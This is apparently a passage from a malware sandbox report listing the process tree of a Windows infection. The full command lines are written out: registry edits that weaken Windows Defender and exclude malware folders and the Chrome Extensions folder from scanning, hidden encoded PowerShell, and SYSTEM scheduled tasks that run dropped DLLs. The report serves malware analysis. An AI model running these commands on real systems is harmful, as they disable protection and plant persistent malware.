- Executes dropped EXE
PID:3732
-
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exeC:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe1⤵
- Executes dropped EXE
PID:4920
-
C:\Users\Admin\AppData\Local\Temp\MOgSoEJifpbrwsMhP\XaWciVoITrkAOBZ\QkjKqSF.exeC:\Users\Admin\AppData\Local\Temp\MOgSoEJifpbrwsMhP\XaWciVoITrkAOBZ\QkjKqSF.exe KF /XUsite_idxyO 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:5104 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:64 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:1264
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:3572
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4856
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:2888
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:4616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:2024
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:4880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4144
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4192
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:4748
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:4452
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:1060
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:4944
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:3408
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:1264
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:3392
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:4856
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:2084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:2076
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4844
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:1980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:3388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:2348
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:4900
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:4220
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:4748
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:1020
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HeOGboFBmZSU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HeOGboFBmZSU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LeqPbaUhHmUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LeqPbaUhHmUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XFwIXNRxU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XFwIXNRxU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YkComOABoMCAC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YkComOABoMCAC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bsTRXRXhJNSQjOPNJAR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bsTRXRXhJNSQjOPNJAR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\dvthXcczdRemkjVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\dvthXcczdRemkjVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\MOgSoEJifpbrwsMhP\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\MOgSoEJifpbrwsMhP\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\PPAJZtVjphubQzgf\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\PPAJZtVjphubQzgf\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4496 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HeOGboFBmZSU2" /t REG_DWORD /d 0 /reg:323⤵PID:5000
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HeOGboFBmZSU2" /t REG_DWORD /d 0 /reg:324⤵PID:4224
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HeOGboFBmZSU2" /t REG_DWORD /d 0 /reg:643⤵PID:212
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LeqPbaUhHmUn" /t REG_DWORD /d 0 /reg:323⤵PID:4176
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LeqPbaUhHmUn" /t REG_DWORD /d 0 /reg:643⤵PID:1412
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XFwIXNRxU" /t REG_DWORD /d 0 /reg:323⤵PID:4216
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XFwIXNRxU" /t REG_DWORD /d 0 /reg:643⤵PID:1460
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YkComOABoMCAC" /t REG_DWORD /d 0 /reg:323⤵PID:2784
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YkComOABoMCAC" /t REG_DWORD /d 0 /reg:643⤵PID:3064
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bsTRXRXhJNSQjOPNJAR" /t REG_DWORD /d 0 /reg:323⤵PID:2112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bsTRXRXhJNSQjOPNJAR" /t REG_DWORD /d 0 /reg:643⤵PID:3180
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\dvthXcczdRemkjVB /t REG_DWORD /d 0 /reg:323⤵PID:2372
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\dvthXcczdRemkjVB /t REG_DWORD /d 0 /reg:643⤵PID:2376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:3388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:2104
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\MOgSoEJifpbrwsMhP /t REG_DWORD /d 0 /reg:323⤵PID:1472
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\MOgSoEJifpbrwsMhP /t REG_DWORD /d 0 /reg:643⤵PID:4744
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\PPAJZtVjphubQzgf /t REG_DWORD /d 0 /reg:323⤵PID:2632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\PPAJZtVjphubQzgf /t REG_DWORD /d 0 /reg:643⤵PID:2060
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gSktTbnQR" /SC once /ST 02:42:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:2236
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gSktTbnQR"2⤵PID:3064
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gSktTbnQR"2⤵PID:2504
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RbhXETnRetCpgcxgd" /SC once /ST 03:42:08 /RU "SYSTEM" /TR "\"C:\Windows\Temp\PPAJZtVjphubQzgf\nScJkdTHFqWjyCm\XnjomcY.exe\" oL /zQsite_idSVk 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2888
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "RbhXETnRetCpgcxgd"2⤵PID:2808
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:3844
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:3560
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:400
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
PID:2780
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:904
-
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exeC:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe1⤵
- Executes dropped EXE
PID:1092
-
C:\Windows\Temp\PPAJZtVjphubQzgf\nScJkdTHFqWjyCm\XnjomcY.exeC:\Windows\Temp\PPAJZtVjphubQzgf\nScJkdTHFqWjyCm\XnjomcY.exe oL /zQsite_idSVk 385118 /S1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:4864 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bbjfBeKuXNIWLGjFwD"2⤵PID:1092
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:228
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:4220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:4908
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:3052
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\XFwIXNRxU\qIaowe.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "CQGwpomRAqWvTFo" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5104
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "CQGwpomRAqWvTFo2" /F /xml "C:\Program Files (x86)\XFwIXNRxU\xlDrTcf.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:448
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "CQGwpomRAqWvTFo"2⤵PID:3160
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "CQGwpomRAqWvTFo"2⤵PID:2808
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ezLtQEcPHMRmDj" /F /xml "C:\Program Files (x86)\HeOGboFBmZSU2\UTIklxL.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1092
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qsdkNbTGotJdE2" /F /xml "C:\ProgramData\dvthXcczdRemkjVB\LMjpeNg.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2368
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ELVKidjNHNiBNDaGH2" /F /xml "C:\Program Files (x86)\bsTRXRXhJNSQjOPNJAR\VBYScFY.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2112
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NykvOAdYtngDezSIDgc2" /F /xml "C:\Program Files (x86)\YkComOABoMCAC\velrBGs.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4128
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "lfoFOTXuNZFAYEPkl" /SC once /ST 01:19:59 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\PPAJZtVjphubQzgf\TYKiAhct\uupkdew.dll\",#1 /Yysite_idrKz 385118" /V1 /F2⤵
- Creates scheduled task(s)
PID:4380 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4908
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "lfoFOTXuNZFAYEPkl"2⤵PID:4392
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:2200
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:4872
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:1312
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:4592
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "RbhXETnRetCpgcxgd"2⤵PID:632
-
-
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exeC:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe1⤵PID:4660
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\PPAJZtVjphubQzgf\TYKiAhct\uupkdew.dll",#1 /Yysite_idrKz 3851181⤵PID:1512
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\PPAJZtVjphubQzgf\TYKiAhct\uupkdew.dll",#1 /Yysite_idrKz 3851182⤵PID:2372
